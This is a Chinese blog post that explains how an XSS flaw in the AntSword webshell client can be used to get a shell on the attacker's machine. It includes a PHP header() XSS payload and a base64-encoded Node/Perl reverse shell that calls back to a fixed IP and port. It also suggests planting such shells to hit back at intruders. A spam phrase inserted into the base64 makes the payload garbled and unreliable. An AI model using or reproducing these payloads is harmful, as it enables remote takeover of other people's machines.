蚁剑xss漏洞,获取者shell


今日在github上看到蚁剑暴露了一个xss漏洞,自己也经常使用蚁剑。同时在freebuf上也有一篇文章,关于蚁剑漏洞的。闲着没事测试了一波。蚁剑shell远程连接失败时,蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。用过蚁剑的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码。
该信息并没有进行 XSS 保护,因此能够利用 js 调用 perl 便可反弹***者的shell很多时候我们不去注意,但这里恰恰就是漏洞利用点。(漏洞往往就在你的眼皮地下,你只要向下看看就能找到。可惜我们只向前看,不向下看。)鉴于本人对js没有深入了解,只懂得些皮毛。这里就直接引用别人写好的shell了<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>');?>Head()函数,向客户端发送原始的 HTTP 报头。
当蚁剑远程连接shell的时候就会触发弹框。将这些代码进行base64加密cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI免费云主机域名7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7构造header将其写入被***中的网站目录下
被***机监听1002端口
***机蚁剑远程连接获得***者shell
在最新的版本中, 修改了 toastr 可以输出 html 的特点,以后均不支持输出 html。建议及时更新到最新版本如果你检测到了自己被上传了webshell,不妨可以试一试这个漏洞,对方如果使用的是蚁剑,当对方连接你的时候,也是他上线的时候。或者在比赛(zhen shi)环境的时候,故意制造一个这样的shell,诱惑一些小可爱连一下。参考链接:
https://github.com/AntSwordProject/antSword/issues/147

相关推荐: chentos7怎么编译安装keepalived

本文小编为大家详细介绍“chentos7怎么编译安装keepalived”,内容详细,步骤免费云主机域名清晰,细节处理妥当,希望这篇“chentos7怎么编译安装keepalived”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。准备…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 01/26 11:31
下一篇 01/26 11:31